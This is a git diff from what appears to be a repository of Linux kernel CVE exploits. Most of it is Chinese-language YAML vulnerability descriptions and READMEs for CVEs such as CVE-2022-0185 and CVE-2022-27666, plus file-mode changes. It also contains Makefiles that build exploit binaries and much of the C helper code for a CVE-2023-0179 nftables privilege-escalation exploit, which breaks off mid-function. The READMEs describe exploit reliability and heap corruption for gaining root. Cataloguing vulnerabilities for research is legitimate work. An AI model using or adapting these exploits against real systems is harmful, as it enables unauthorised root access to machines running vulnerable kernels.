@@ -1,22 +1,22 @@ -id: CVE-2021-43267 -source: https://github.com/zzhacked/CVE-2021-43267 -info: - name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核 - severity: critical - description: - 该漏洞是由于Linux内核中的net/tipc/crypto.c存在溢出漏洞, TIPC在2020年9月引入的新用户消息类型“MSG_CRYPTO”, 其标头大小和消息大小都根据实际数据包大小进行验证, 但对于消息的keylen成员MSG_CRYPTO或密钥算法名称本身(TIPC_AEAD_ALG_NAME)的大小没有类似大小的检查, 这就导致恶意攻击者可以在此处构造一个较小的恶意数据包, 然后利用keylen成员属性的任意大小特性写入该位置的边界之外, 从而造成远程代码执行. 由于本地对于内核堆大小的控制更加容易, 因此该漏洞很容易在本地进行利用, 而因为TIPC本身的特性, 恶意攻击者也可以利用该漏洞实施远程攻击, 由于该漏洞利用方式简单, 危害较大. - scope-of-influence: - 5.10-rc1 < Linux Kernel < 5.15 - reference: - - https://www.sentinelone.com/labs/tipc-remote-linux-kernel-heap-overflow-allows-arbitrary-code-execution/ - - https://thehackernews.com/2021/11/critical-rce-vulnerability-reported-in.html - - https://www.zdnet.com/article/remote-code-execution-flaw-patched-in-linux-kernel-tipc-module/#ftag=RSSbaffb68 - - https://nvd.nist.gov/vuln/detail/CVE-2021-43267 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2021-43267 - cwe-id: CWE-20 - cnvd-id: None - kve-id: None +id: CVE-2021-43267 +source: https://github.com/zzhacked/CVE-2021-43267 +info: + name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核 + severity: critical + description: + 该漏洞是由于Linux内核中的net/tipc/crypto.c存在溢出漏洞, TIPC在2020年9月引入的新用户消息类型“MSG_CRYPTO”, 其标头大小和消息大小都根据实际数据包大小进行验证, 但对于消息的keylen成员MSG_CRYPTO或密钥算法名称本身(TIPC_AEAD_ALG_NAME)的大小没有类似大小的检查, 这就导致恶意攻击者可以在此处构造一个较小的恶意数据包, 然后利用keylen成员属性的任意大小特性写入该位置的边界之外, 从而造成远程代码执行. 由于本地对于内核堆大小的控制更加容易, 因此该漏洞很容易在本地进行利用, 而因为TIPC本身的特性, 恶意攻击者也可以利用该漏洞实施远程攻击, 由于该漏洞利用方式简单, 危害较大. 
+ scope-of-influence: + 5.10-rc1 < Linux Kernel < 5.15 + reference: + - https://www.sentinelone.com/labs/tipc-remote-linux-kernel-heap-overflow-allows-arbitrary-code-execution/ + - https://thehackernews.com/2021/11/critical-rce-vulnerability-reported-in.html + - https://www.zdnet.com/article/remote-code-execution-flaw-patched-in-linux-kernel-tipc-module/#ftag=RSSbaffb68 + - https://nvd.nist.gov/vuln/detail/CVE-2021-43267 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2021-43267 + cwe-id: CWE-20 + cnvd-id: None + kve-id: None tags: 堆溢出漏洞 \ No newline at end of file diff --git a/cve/linux-kernel/2022/CVE-2022-0185/Makefile b/cve/linux-kernel/2022/CVE-2022-0185/Makefile index 615313cf36ad22261759ccbb65c5e278ad8dc38a..470206368db598a9f6b3f4a6920d9c5dd1ec0929 100644 --- a/cve/linux-kernel/2022/CVE-2022-0185/Makefile +++ b/cve/linux-kernel/2022/CVE-2022-0185/Makefile @@ -1,2 +1,2 @@ -all: exploit.c +all: exploit.c gcc exploit.c -o exploit -static -no-pie -s \ No newline at end of file diff --git a/cve/linux-kernel/2022/CVE-2022-0185/README.md b/cve/linux-kernel/2022/CVE-2022-0185/README.md index 90bfd2aa5e07b28d943307c7684074c0ac5dec76..33aeb800d4114c7f35ca7c60f2fa6a9438e80c72 100644 --- a/cve/linux-kernel/2022/CVE-2022-0185/README.md +++ b/cve/linux-kernel/2022/CVE-2022-0185/README.md 
@@ -1,10 +1,10 @@
-# CVE-2022-0185 pipe version
-
-Using pipe-primitive to exploit CVE-2022-0185, so no kaslr leak nor smap smep ktpi bypass is needed :)
-
-(Q: What is pipe-primitive? A: https://github.com/veritas501/pipe-primitive)
-
-![](assets/it_works.png)
-
-### 漏洞检测程序来源
-- https://github.com/veritas501/CVE-2022-0185-PipeVersion
+# CVE-2022-0185 pipe version
+
+Using pipe-primitive to exploit CVE-2022-0185, so no kaslr leak nor smap smep ktpi bypass is needed :)
+
+(Q: What is pipe-primitive? A: https://github.com/veritas501/pipe-primitive)
+
+![](assets/it_works.png)
+
+### 漏洞检测程序来源
+- https://github.com/veritas501/CVE-2022-0185-PipeVersion
diff --git a/cve/linux-kernel/2022/CVE-2022-0847/compile.sh b/cve/linux-kernel/2022/CVE-2022-0847/compile.sh
old mode 100755
new mode 100644
diff --git a/cve/linux-kernel/2022/CVE-2022-25636/README.md b/cve/linux-kernel/2022/CVE-2022-25636/README.md
index 72351dad298b02ad1280ad3fcad795fff4cee980..d6ed3ca03682b64836d4c5a9cc17a97383ab449d 100644
--- a/cve/linux-kernel/2022/CVE-2022-25636/README.md
+++ b/cve/linux-kernel/2022/CVE-2022-25636/README.md
@@ -1,29 +1,29 @@
-
-
-__漏洞概述:__
-
-攻击者可利用该漏洞访问越界内存,从而导致系统崩溃或进行提权。Linux内核中netfilter子组件引起的越界内存访问漏洞,Netfilter是Linux 2.4.x引入的一个子系统,提供了一整套hook函数的管理机制,实现了数据包过滤、NAT等功能。
-
-__环境:__
-
-Linux内核为5.13.0-30。
-
-__注意事项:__
-
-exploit并不是每次都生效(~40%),失败后需重新启动后再exploit。
-
-可利用可能破坏堆上的重要数据,或进行提权。
-
-__原理说明:__
-
-漏洞的发生点位于:
-
-​ linux\net\netfilter\nf_dup_netdev.c : 67 : nft_fwd_dup_netdev_offload
-
-​ 在设置flow->rule->action.entries时没有对堆边界进行检查。
-
-__参考资料:__
-
-代码来自于 https://github.com/Bonfee/CVE-2022-25636
-
+
+
+__漏洞概述:__
+
+攻击者可利用该漏洞访问越界内存,从而导致系统崩溃或进行提权。Linux内核中netfilter子组件引起的越界内存访问漏洞,Netfilter是Linux 2.4.x引入的一个子系统,提供了一整套hook函数的管理机制,实现了数据包过滤、NAT等功能。
+
+__环境:__
+
+Linux内核为5.13.0-30。
+
+__注意事项:__
+
+exploit并不是每次都生效(~40%),失败后需重新启动后再exploit。
+
+可利用可能破坏堆上的重要数据,或进行提权。
+
+__原理说明:__
+
+漏洞的发生点位于:
+
+​ linux\net\netfilter\nf_dup_netdev.c : 67 : nft_fwd_dup_netdev_offload
+
+​ 在设置flow->rule->action.entries时没有对堆边界进行检查。
+
+__参考资料:__
+
+代码来自于 https://github.com/Bonfee/CVE-2022-25636
+
 参考链接:https://www.openwall.com/lists/oss-security/2022/02/21/2
\ No newline at end of file
diff --git a/cve/linux-kernel/2022/CVE-2022-2588/exp_file_credential b/cve/linux-kernel/2022/CVE-2022-2588/exp_file_credential
old mode 100755
new mode 100644
diff --git a/cve/linux-kernel/2022/CVE-2022-27666/README.md b/cve/linux-kernel/2022/CVE-2022-27666/README.md
index 397df2c5977035462ebb261c20d11fac38f7f3ff..655cf99cf8c00ffd774ae5042a343a7f4466e65a 100644
--- a/cve/linux-kernel/2022/CVE-2022-27666/README.md
+++ b/cve/linux-kernel/2022/CVE-2022-27666/README.md
@@ -1,17 +1,17 @@
-**漏洞描述:**
-
-这是针对CVE-2022-27666的漏洞,该漏洞在UbuntuDesktop21.10上实现本地权限升级。本地攻击者可利用该漏洞通过覆盖内核堆对象获得特权。
-
-**影响版本:**
-
-linux kernel 5.17-rc5
-
-**漏洞危害**
-
-漏洞危害: 该漏洞源于net/ipv4/esp4.c 和 net/ipv6/esp6.c 中IPsec ESP 代码存在缓冲区溢出,此缺陷允许具有普通用户权限的本地攻击者覆盖内核堆对象,并可能导致本地权限升级威胁。
-
-**参考资料**
-
-代码来自:https://github.com/plummm/CVE-2022-27666
-
+**漏洞描述:**
+
+这是针对CVE-2022-27666的漏洞,该漏洞在UbuntuDesktop21.10上实现本地权限升级。本地攻击者可利用该漏洞通过覆盖内核堆对象获得特权。
+
+**影响版本:**
+
+linux kernel 5.17-rc5
+
+**漏洞危害**
+
+漏洞危害: 该漏洞源于net/ipv4/esp4.c 和 net/ipv6/esp6.c 中IPsec ESP 代码存在缓冲区溢出,此缺陷允许具有普通用户权限的本地攻击者覆盖内核堆对象,并可能导致本地权限升级威胁。
+
+**参考资料**
+
+代码来自:https://github.com/plummm/CVE-2022-27666
+
 参考链接:https://cdn.kernel.org/pub/linux/kernel/v5.x/ChangeLog-5.16.15
\ No newline at end of file
diff --git a/cve/linux-kernel/2022/CVE-2022-27666/compile.sh b/cve/linux-kernel/2022/CVE-2022-27666/compile.sh
old mode 100755
new mode 100644
diff --git a/cve/linux-kernel/2022/CVE-2022-27666/download_symbol.sh b/cve/linux-kernel/2022/CVE-2022-27666/download_symbol.sh
old mode 100755
new mode 100644
diff --git a/cve/linux-kernel/2022/CVE-2022-27666/run.sh b/cve/linux-kernel/2022/CVE-2022-27666/run.sh
old mode 100755
new mode 100644
diff --git a/cve/linux-kernel/2022/yaml/ CVE-2022-36946.yaml b/cve/linux-kernel/2022/yaml/ CVE-2022-36946.yaml
index eb773fd638c81bc9ea9f9193d64d4af14cafef48..2c0bf1f06eecb9b233fc7ec46de31b6d929c4683 100644
--- a/cve/linux-kernel/2022/yaml/ CVE-2022-36946.yaml
+++ b/cve/linux-kernel/2022/yaml/ CVE-2022-36946.yaml
@@ -1,18 +1,18 @@
-id: CVE-2022-36946
-source: https://github.com/Pwnzer0tt1/CVE-2022-36946
-info:
- name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。
- severity: 高危
- description: |
- Linux5.18.14 内核中 net/netfilter/nfnetlink_queue.c 的nfqnl_mangle允许远程攻击者造成拒绝服务 (panic),因为在具有单字节nfta_payload属性的nf_queue判定的情况下,skb_pull可能会遇到负的 skb->len。
- scope-of-influence:
- 5.18.14
- reference:
- - https://nvd.nist.gov/vuln/detail/CVE-2022-36946
- - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit?id=722d94847de29310e8aa03fcbdb41fc92c521756
- - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36946
- classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
- cvss-score: 7.5
- cve-id: CVE-2022-36946
+id: CVE-2022-36946
+source: https://github.com/Pwnzer0tt1/CVE-2022-36946
+info:
+ name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。
+ severity: 高危
+ description: |
+ Linux5.18.14 内核中 net/netfilter/nfnetlink_queue.c 的nfqnl_mangle允许远程攻击者造成拒绝服务 (panic),因为在具有单字节nfta_payload属性的nf_queue判定的情况下,skb_pull可能会遇到负的 skb->len。
+ scope-of-influence:
+ 5.18.14
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-36946
+ - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit?id=722d94847de29310e8aa03fcbdb41fc92c521756
+ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36946
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
+ cvss-score: 7.5
+ cve-id: CVE-2022-36946
 tags: 拒绝服务,cve2022
\ No newline at end of file
diff --git a/cve/linux-kernel/2022/yaml/CVE-2022-0435.yaml b/cve/linux-kernel/2022/yaml/CVE-2022-0435.yaml
index 64fbf4c341e37ad6fbc62d806cfa8ad33e18f17f..cdf3a35d162a9c218a86837d0d5f526383930c75 100644
--- a/cve/linux-kernel/2022/yaml/CVE-2022-0435.yaml
+++ b/cve/linux-kernel/2022/yaml/CVE-2022-0435.yaml
@@ -1,23 +1,23 @@
-id: CVE-2022-0435
-source:
- https://github.com/wlswotmd/CVE-2022-0435
-info:
- name: Linux kernel是Linux操作系统的主要组件, 也是计算机硬件与其进程之间的核心. 它负责两者之间的通信, 还要尽可能高效地管理资源. Linux kernel主要负责内存管理、进程管理、设备驱动程序、系统调用和安全防护四项作用.
- severity: high
- description:
- 在Linux内核的TIPC协议功能中发现了一个堆栈溢出缺陷, 即用户发送带有恶意内容的数据包时, 域成员节点的数量高于允许的64个. 这个缺陷允许远程用户崩溃系统, 如果他们能够访问TIPC网络, 则可能提升其权限.
- scope-of-influence:
- linux_kernel 4, linux_kernel 5, Red Hat Enterprise Linux 8, redhat virtualization 4
- references:
- - https://nvd.nist.gov/vuln/detail/CVE-2022-0435
- - https://bugzilla.redhat.com/show_bug.cgi?id=2048738
- - https://security.netapp.com/advisory/ntap-20220602-0001/
- - https://www.openwall.com/lists/oss-security/2022/02/10/1
- classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
- cvss-score: 8.8
- cvi-id: CVE-2022-0435
- cwe-id: CWE-787
- cnvd-id: None
- kve-id: None
+id: CVE-2022-0435
+source:
+ https://github.com/wlswotmd/CVE-2022-0435
+info:
+ name: Linux kernel是Linux操作系统的主要组件, 也是计算机硬件与其进程之间的核心. 它负责两者之间的通信, 还要尽可能高效地管理资源. Linux kernel主要负责内存管理、进程管理、设备驱动程序、系统调用和安全防护四项作用.
+ severity: high
+ description:
+ 在Linux内核的TIPC协议功能中发现了一个堆栈溢出缺陷, 即用户发送带有恶意内容的数据包时, 域成员节点的数量高于允许的64个. 这个缺陷允许远程用户崩溃系统, 如果他们能够访问TIPC网络, 则可能提升其权限.
+ scope-of-influence:
+ linux_kernel 4, linux_kernel 5, Red Hat Enterprise Linux 8, redhat virtualization 4
+ references:
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-0435
+ - https://bugzilla.redhat.com/show_bug.cgi?id=2048738
+ - https://security.netapp.com/advisory/ntap-20220602-0001/
+ - https://www.openwall.com/lists/oss-security/2022/02/10/1
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 8.8
+ cvi-id: CVE-2022-0435
+ cwe-id: CWE-787
+ cnvd-id: None
+ kve-id: None
 tags: 提升权限, 堆栈溢出
\ No newline at end of file
diff --git a/cve/linux-kernel/2022/yaml/CVE-2022-2586.yaml b/cve/linux-kernel/2022/yaml/CVE-2022-2586.yaml
index d857929551429400189d9e6f2c1c23a2f28d54c0..aa7b89c2d2b87e90a41e874de7bf592c507dfbb2 100644
--- a/cve/linux-kernel/2022/yaml/CVE-2022-2586.yaml
+++ b/cve/linux-kernel/2022/yaml/CVE-2022-2586.yaml
@@ -1,29 +1,29 @@
-id: CVE-2022-2586
-source: https://github.com/aels/CVE-2022-2586-LPE
-info:
- name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。
- severity: medium
- description: |
- Linux nf_tables cross-table存在安全漏洞,该漏洞源于释放后重用,允许本地特权攻击者在删除表时导致释放后重用,可能导致本地特权升级。
- scope-of-influence:
- Red Hat Enterprise Linux 9
- reference:
- - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2586
- - https://www.openwall.com/lists/oss-security/2022/08/09/5
- - https://lore.kernel.org/netfilter-devel/20220809170148.164591-1-cascardo@canonical.com/T/#t
- - https://www.zerodayinitiative.com/advisories/ZDI-22-1118/
- - https://ubuntu.com/security/notices/USN-5557-1
- - https://ubuntu.com/security/notices/USN-5560-1
- - https://ubuntu.com/security/notices/USN-5560-2
- - https://ubuntu.com/security/notices/USN-5562-1
- - https://ubuntu.com/security/notices/USN-5564-1
- - https://ubuntu.com/security/notices/USN-5565-1
- - https://ubuntu.com/security/notices/USN-5566-1
- - https://ubuntu.com/security/notices/USN-5567-1
- - https://ubuntu.com/security/notices/USN-5582-1
- classification:
- cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
- cvss-score: 6.7
- cve-id: CVE-2022-2586
- cnvd-id: NONE
+id: CVE-2022-2586
+source: https://github.com/aels/CVE-2022-2586-LPE
+info:
+ name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。
+ severity: medium
+ description: |
+ Linux nf_tables cross-table存在安全漏洞,该漏洞源于释放后重用,允许本地特权攻击者在删除表时导致释放后重用,可能导致本地特权升级。
+ scope-of-influence:
+ Red Hat Enterprise Linux 9
+ reference:
+ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2586
+ - https://www.openwall.com/lists/oss-security/2022/08/09/5
+ - https://lore.kernel.org/netfilter-devel/20220809170148.164591-1-cascardo@canonical.com/T/#t
+ - https://www.zerodayinitiative.com/advisories/ZDI-22-1118/
+ - https://ubuntu.com/security/notices/USN-5557-1
+ - https://ubuntu.com/security/notices/USN-5560-1
+ - https://ubuntu.com/security/notices/USN-5560-2
+ - https://ubuntu.com/security/notices/USN-5562-1
+ - https://ubuntu.com/security/notices/USN-5564-1
+ - https://ubuntu.com/security/notices/USN-5565-1
+ - https://ubuntu.com/security/notices/USN-5566-1
+ - https://ubuntu.com/security/notices/USN-5567-1
+ - https://ubuntu.com/security/notices/USN-5582-1
+ classification:
+ cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 6.7
+ cve-id: CVE-2022-2586
+ cnvd-id: NONE
 tags: netfilter, cve2022
\ No newline at end of file
diff --git a/cve/linux-kernel/2022/yaml/CVE-2022-32250.yaml b/cve/linux-kernel/2022/yaml/CVE-2022-32250.yaml
index 611fb2f14924f12afb97261c2172e9bad80466d9..62fd85c07765282abc9c257c515a26b515bf4c41 100644
--- a/cve/linux-kernel/2022/yaml/CVE-2022-32250.yaml
+++ b/cve/linux-kernel/2022/yaml/CVE-2022-32250.yaml
@@ -1,18 +1,18 @@
-id: CVE-2022-32250
-source: https://github.com/theori-io/CVE-2022-32250-exploit
-info:
- name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。
- severity: high
- description: |
- Linux内核5.18.1中的net/netfilter/nf_tables_api.c允许本地用户(能够创建用户/net命名空间)将权限升级到root,因为错误的NFT_STATEFUL_EXPR检查会导致释放后使用。
- scope-of-influence:
- Linux kernel 5.15.0-27
- reference:
- - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32250
- - https://www.cnnvd.org.cn/home/globalSearch?keyword=CVE-2022-32250
- classification:
- cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
- cvss-score: 7.8
- cve-id: CVE-2022-32250
- cnvd-id: CNNVD-202206-407
- tags: CVSS严重性评级,修复信息,易受攻击的软件版本,SCAP映射,CPE信息,cve2022
+id: CVE-2022-32250
+source: https://github.com/theori-io/CVE-2022-32250-exploit
+info:
+ name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。
+ severity: high
+ description: |
+ Linux内核5.18.1中的net/netfilter/nf_tables_api.c允许本地用户(能够创建用户/net命名空间)将权限升级到root,因为错误的NFT_STATEFUL_EXPR检查会导致释放后使用。
+ scope-of-influence:
+ Linux kernel 5.15.0-27
+ reference:
+ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32250
+ - https://www.cnnvd.org.cn/home/globalSearch?keyword=CVE-2022-32250
+ classification:
+ cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 7.8
+ cve-id: CVE-2022-32250
+ cnvd-id: CNNVD-202206-407
+ tags: CVSS严重性评级,修复信息,易受攻击的软件版本,SCAP映射,CPE信息,cve2022
diff --git a/cve/linux-kernel/2023/CVE-2023-0179/Makefile b/cve/linux-kernel/2023/CVE-2023-0179/Makefile
index 2a0391f005bb59a224976f3fcacd5038fecc01df..9431825d877873c2ec8e966781c0bc8efe8b1295 100644
--- a/cve/linux-kernel/2023/CVE-2023-0179/Makefile
+++ b/cve/linux-kernel/2023/CVE-2023-0179/Makefile
@@ -1,12 +1,12 @@
-objects= ./helpers.o ./exploit.o ./needle.o
-
-.PHONY: clean needle
-
-needle: $(objects)
- $(CC) $(objects) -lmnl -lnftnl -o needle
-
-./%.o: %.c
- $(CC) -c $(CFLAGS) -o "$@" "$<"
-
-clean:
- rm -rf ./helpers.o ./needle.o ./needle ./exploit.o
+objects= ./helpers.o ./exploit.o ./needle.o
+
+.PHONY: clean needle
+
+needle: $(objects)
+ $(CC) $(objects) -lmnl -lnftnl -o needle
+
+./%.o: %.c
+ $(CC) -c $(CFLAGS) -o "$@" "$<"
+
+clean:
+ rm -rf ./helpers.o ./needle.o ./needle ./exploit.o
diff --git a/cve/linux-kernel/2023/CVE-2023-0179/helpers.c b/cve/linux-kernel/2023/CVE-2023-0179/helpers.c
index ca5ebf229d9d9cf528dd94282b99d48cbd303695..706ac92794eba3fc796f08ecd53b331f3e20f927 100644
--- a/cve/linux-kernel/2023/CVE-2023-0179/helpers.c
+++ b/cve/linux-kernel/2023/CVE-2023-0179/helpers.c
@@ -1,395 +1,395 @@ -/* - * ---------------------------------------------------------------------------- - * "THE BEER-WARE LICENSE" (Revision 42): - * David Bouman (pql) wrote this file. As long as you retain this notice you - * can do whatever you want with this stuff. If we meet some day, and you think - * this stuff is worth it, you can buy me a beer in return. Signed, David. - * ---------------------------------------------------------------------------- - */ - -#define _GNU_SOURCE -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include - -#include "helpers.h" - -unsigned long read_from_file(int line) { - int fd; - char buf[20]; - unsigned long result; - char *endptr; - - fd = open("reg.log", O_RDONLY); - if (fd == -1) { - perror("open"); - exit(1); - } - - if (read(fd, buf, sizeof(buf)) == -1) { - perror("read"); - close(fd); - exit(1); - } - - if (line == 1 && read(fd, buf, sizeof(buf)) == -1) { - perror("read"); - close(fd); - exit(1); - } - - result = strtoul(buf, &endptr, 16); - if (result == ULONG_MAX && endptr == buf) { - fprintf(stderr, "strtoul: invalid argument\n"); - close(fd); - exit(1); - } - close(fd); - return result; -} - -static uint64_t default_batch_req_handler(struct mnl_socket* nl, int portid, int table_seq) -{ - char buf[MNL_SOCKET_BUFFER_SIZE]; - - int ret = mnl_socket_recvfrom(nl, buf, sizeof(buf)); - - while (ret > 0) { - ret = mnl_cb_run(buf, ret, table_seq, portid, NULL, NULL); - if (ret <= 0) break; - ret = mnl_socket_recvfrom(nl, buf, sizeof(buf)); - } - return ret; -} - -int64_t send_batch_request(struct mnl_socket* nl, uint16_t msg, uint16_t msg_flags, uint16_t family, void** object, int* seq, uint64_t (*result_handler)(struct mnl_socket*, int, int)) -{ - char buf[MNL_SOCKET_BUFFER_SIZE]; - struct mnl_nlmsg_batch* batch = mnl_nlmsg_batch_start(buf, sizeof buf); - uint8_t msg_type = msg & 0xff; - uint8_t 
nft_type = (msg >> 8) & 0xff; - nftnl_batch_begin(mnl_nlmsg_batch_current(batch), (*seq)++); - mnl_nlmsg_batch_next(batch); - int table_seq = *seq; - struct nlmsghdr* nlh; - - if (result_handler == NULL) { - result_handler = default_batch_req_handler; - } - - if (msg == NFT_MSG_NEWSET) { - nlh = nftnl_set_nlmsg_build_hdr( - mnl_nlmsg_batch_current(batch), - NFT_MSG_NEWSET, family, - msg_flags | NLM_F_ACK, (*seq)++); - } else { - nlh = nftnl_nlmsg_build_hdr( - mnl_nlmsg_batch_current(batch), - msg_type, family, - msg_flags | NLM_F_ACK, (*seq)++ - ); - } - if (msg == NFT_MSG_NEWSET) { - nftnl_set_nlmsg_build_payload(nlh, *object); - nftnl_set_free(*object); - } else { - switch(nft_type) { - case NFT_TYPE_TABLE: - nftnl_table_nlmsg_build_payload(nlh, *object); - nftnl_table_free(*object); - break; - case NFT_TYPE_CHAIN: - nftnl_chain_nlmsg_build_payload(nlh, *object); - nftnl_chain_free(*object); - break; - case NFT_TYPE_RULE: - nftnl_rule_nlmsg_build_payload(nlh, *object); - // offload mnl_attr_put_u32(nlh, NFTA_CHAIN_FLAGS, htonl(2)); - nftnl_rule_free(*object); - break; - default: - return -1; - } - } - - *object = NULL; - - mnl_nlmsg_batch_next(batch); - nftnl_batch_end(mnl_nlmsg_batch_current(batch), (*seq)++); - mnl_nlmsg_batch_next(batch); - - int ret = mnl_socket_sendto( - nl, - mnl_nlmsg_batch_head(batch), - mnl_nlmsg_batch_size(batch) - ); - - if (ret < 0) { - perror("mnl_socket_send"); - return -1; - } - - int portid = mnl_socket_get_portid(nl); - - mnl_nlmsg_batch_stop(batch); - - result_handler(nl, portid, table_seq); -} - -struct nftnl_table* build_table(char* name, uint16_t family) -{ - struct nftnl_table* t = nftnl_table_alloc(); - - nftnl_table_set_u32(t, NFTNL_TABLE_FAMILY, family); - nftnl_table_set_str(t, NFTNL_TABLE_NAME, name); - - return t; -} - -struct nftnl_chain* build_chain(char* table_name, char* chain_name, char *dev_name, struct unft_base_chain_param* base_param) -{ - struct nftnl_chain* c; - - c = nftnl_chain_alloc(); - - 
nftnl_chain_set_str(c, NFTNL_CHAIN_NAME, chain_name); - nftnl_chain_set_str(c, NFTNL_CHAIN_TABLE, table_name); - if (dev_name) - nftnl_chain_set_str(c, NFTNL_CHAIN_DEV, dev_name); - - if (base_param) { - nftnl_chain_set_u32(c, NFTNL_CHAIN_HOOKNUM, base_param->hook_num); - nftnl_chain_set_u32(c, NFTNL_CHAIN_PRIO, base_param->prio); - } - - return c; -} - -struct nftnl_rule* build_rule(char* table_name, char* chain_name, uint16_t family, uint64_t* handle) -{ - struct nftnl_rule* r = NULL; - uint8_t proto; - - r = nftnl_rule_alloc(); - - nftnl_rule_set_str(r, NFTNL_RULE_TABLE, table_name); - nftnl_rule_set_str(r, NFTNL_RULE_CHAIN, chain_name); - nftnl_rule_set_u32(r, NFTNL_RULE_FAMILY, family); - - if (handle) { - nftnl_rule_set_u64(r, NFTNL_RULE_POSITION, *handle); - } - - return r; -} - -struct nftnl_set* build_set(char *table_name, char *set_name, uint16_t family) -{ - // Create a new set object - struct nftnl_set *set = nftnl_set_alloc(); - - nftnl_set_set_str(set, NFTNL_SET_TABLE, table_name); - nftnl_set_set_str(set, NFTNL_SET_NAME, set_name); - nftnl_set_set_u32(set, NFTNL_SET_FLAGS, NFT_SET_MAP); - nftnl_set_set_u32(set, NFTNL_SET_DATA_TYPE, NFT_DATA_VALUE); - nftnl_set_set_u32(set, NFTNL_SET_KEY_LEN, 4); - nftnl_set_set_u32(set, NFTNL_SET_DATA_LEN, 4); - nftnl_set_set_u32(set, NFTNL_SET_FAMILY, family); - nftnl_set_set_u32(set, NFTNL_SET_ID, 1); - - //nftnl_set_add_expr(set, expr); - return set; -} - -#define NFTA_BITWISE_OP NFTA_BITWISE_XOR + 1 -#define NFTA_BITWISE_DATA NFTA_BITWISE_OP + 1 - -void rule_add_bit_shift( - struct nftnl_rule* r, uint32_t shift_type, uint32_t bitwise_len, - uint32_t bitwise_sreg, uint32_t bitwise_dreg, void* data, uint32_t data_len) -{ - - if(bitwise_len > 0xff) { - puts("bitwise_len > 0xff"); - exit(EXIT_FAILURE); - } - - struct nftnl_expr* e; - e = nftnl_expr_alloc("bitwise"); - - nftnl_expr_set_u32(e, NFTA_BITWISE_SREG, bitwise_sreg); - nftnl_expr_set_u32(e, NFTA_BITWISE_DREG, bitwise_dreg); - nftnl_expr_set_u32(e, 
NFTA_BITWISE_OP, shift_type); - nftnl_expr_set_u32(e, NFTA_BITWISE_LEN, bitwise_len); - nftnl_expr_set_data(e, NFTA_BITWISE_DATA, data, data_len); - - nftnl_rule_add_expr(r, e); -} - -void rule_add_memcpy(struct nftnl_rule* r, uint32_t len, uint32_t sreg, uint32_t dreg) -{ - uint32_t data = 0; - rule_add_bit_shift(r, NFT_BITWISE_LSHIFT, len, sreg, dreg, &data, sizeof(data)); -} - -void rule_add_dynset(struct nftnl_rule* r, char *set_name, uint32_t reg_key, uint32_t reg_data) -{ - struct nftnl_expr *expr = nftnl_expr_alloc("dynset"); - nftnl_expr_set_str(expr, NFTNL_EXPR_DYNSET_SET_NAME, set_name); - nftnl_expr_set_u32(expr, NFTNL_EXPR_DYNSET_OP, NFT_DYNSET_OP_UPDATE); - nftnl_expr_set_u32(expr, NFTNL_EXPR_DYNSET_SET_ID, 1); - nftnl_expr_set_u32(expr, NFTNL_EXPR_DYNSET_SREG_KEY, reg_key); - nftnl_expr_set_u32(expr, NFTNL_EXPR_DYNSET_SREG_DATA, reg_data); - nftnl_rule_add_expr(r, expr); -} - -void rule_add_lookup(struct nftnl_rule* r, char *set_name, uint32_t reg_key, uint32_t reg_data) -{ - struct nftnl_expr *expr = nftnl_expr_alloc("lookup"); - nftnl_expr_set_str(expr, NFTNL_EXPR_LOOKUP_SET, set_name); - nftnl_expr_set_u32(expr, NFTNL_EXPR_LOOKUP_SET_ID, 1); - nftnl_expr_set_u32(expr, NFTNL_EXPR_LOOKUP_SREG, reg_key); - nftnl_expr_set_u32(expr, NFTNL_EXPR_LOOKUP_DREG, reg_data); - nftnl_rule_add_expr(r, expr); -} - -void rule_add_payload(struct nftnl_rule* r, uint32_t base, uint32_t offset, uint32_t len, uint32_t dreg) -{ - struct nftnl_expr* e; - e = nftnl_expr_alloc("payload"); - - nftnl_expr_set_u32(e, NFTNL_EXPR_PAYLOAD_BASE, base); - nftnl_expr_set_u32(e, NFTNL_EXPR_PAYLOAD_OFFSET, offset); - nftnl_expr_set_u32(e, NFTNL_EXPR_PAYLOAD_LEN, len); - nftnl_expr_set_u32(e, NFTNL_EXPR_PAYLOAD_DREG, dreg); - - nftnl_rule_add_expr(r, e); -} - -void rule_add_cmp(struct nftnl_rule* r, uint32_t op, uint32_t sreg, void* data, size_t data_len) -{ - struct 